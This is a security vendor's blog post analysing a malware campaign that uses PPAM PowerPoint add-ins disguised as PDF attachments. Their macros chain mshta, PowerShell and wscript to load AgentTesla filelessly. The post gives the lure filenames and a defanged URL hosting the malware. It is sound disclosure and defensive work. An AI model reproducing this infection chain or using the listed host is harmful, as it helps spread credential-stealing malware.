On April 2021, the ASEC analysis team introduced the malware delivered via PowerPoint files attached to email in the ASEC blog. The team has found continuous malicious activities that use PPAM files in the form of PowerPoint and thus is sharing them.
When a macro included in the PowerPoint is executed, it used mshta.exe to use blogspot website source inserted with a malicious script to attack. However, a distinct feature of this case is that it became more complicated with the addition of a process using powershell.exe and wscript.ext.
When the macro of the PPAM file with a VBA code is executed, it calls on an external script through mshta.exe. The website is confirmed to be a blogger website (Final URL) with a malicious script inserted. Inserted scripts exist in two places: one is annotated, so executing the script is useless, thus the malicious behavior is performed through the other script below. (Annotated and inserted script will be introduced additionally in the latter part of this post.)
When the inserted script in Figure 5 is decrypted, a code is found (see Figure 6). As shown in line 45, there is a script that executes upon calling on an external URL from line 39 (see Figure 5).
The script that isn’t annotated is written to download Google main page’s web source, but if the attacker edits the URL, it can download scripts from a malicious website. Based on the factors seen in the manifestation process of malicious codes, it has been found through the internal infrastructure that the same type of files was distributed.
The filenames of the PPT distributed as attachments are usually disguised as a PDF extension as shown below. Upon looking at the period the files were collected through internal infrastructure, it was confirmed that they have been largely distributed since around the end of July.
- ReservationId ,pdf.ppam
- swift copy,pdf.ppam
- Outstanding and Overdue Balances 31-07-21,pdf.ppam
The following is a brief description of the annotated and inserted malicious script. All the websites below that had been found additionally have malicious scripts inserted. The shaded area in the figure (line 69) shows the command, which is the CLASSID of “Wscript.Shell” that runs with WMI. On the website ‘hxxps://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles[.]com’ found at the bottom of the script, AgentTesla malware exists in a binary form, and if this script is executed, it runs as a fileless form on the memory.
Ultimately, the malware form in the post in April mentioned at the beginning of this post (AgentTesla that runs as a fileless form) has become more complicated through annotated malicious scripts and is continuing to be distributed to this day.
As we always say so, considering a substantial part of threats comes from spam mails, users should refrain from opening attached files in emails from unknown sources.
Also, users are advised to update the anti-malware engine pattern to its latest version.
AhnLab’s anti-malware product, V3, detects and blocks the malicious files introduced in the post using the aliases below.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.